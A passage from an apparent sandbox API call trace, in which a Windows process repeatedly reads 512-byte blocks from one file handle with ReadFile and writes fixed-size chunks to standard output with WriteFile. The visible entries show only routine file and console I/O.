lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.312] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.313] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType 
(hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.314] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.314] GetFileType (hFile=0x50) returned 0x1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, 
lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 
[0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, 
lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, 
lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: 
lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, 